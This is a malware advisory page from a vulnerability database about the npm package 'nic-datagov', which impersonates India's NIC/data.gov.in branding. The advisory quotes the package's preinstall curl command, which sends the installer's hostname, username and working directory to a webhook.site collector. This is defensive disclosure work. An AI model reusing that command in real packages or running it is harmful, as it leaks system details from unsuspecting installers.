VDB
EN

MAL-2026-5836

Malicious code in nic-datagov (npm)

상세

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (89be7e0ea4d164dad90f5476041928d54d5502a066e22d501373e1bbf9dc8bbf) package.json declares a preinstall script that runs `curl --data-urlencode "info=$(hostname && whoami && pwd)" https://webhook.site/1ea0386f-dcc0-4f1b-bdbb-61732d6535fb/nic-datagov`, sending the installer's hostname, current user, and working directory to a webhook.site collector on `npm install`. The package ships no library code and has no `main`/`files` consistent with its stated 'NIC Data.gov.in integration library' description — its sole effect on install is the recon beacon. The name and description impersonate India's NIC/data.gov.in branding, consistent with a targeted dependency-confusion probe against an internal/government namespace.

이 버전이 영향받나요?

사용 중인 패키지 버전을 입력하면 즉시 평가합니다.

영향 패키지

npm / nic-datagov

No fixed version published yet for nic-datagov (npm). Pin to a known-safe version or switch to an alternative.

참고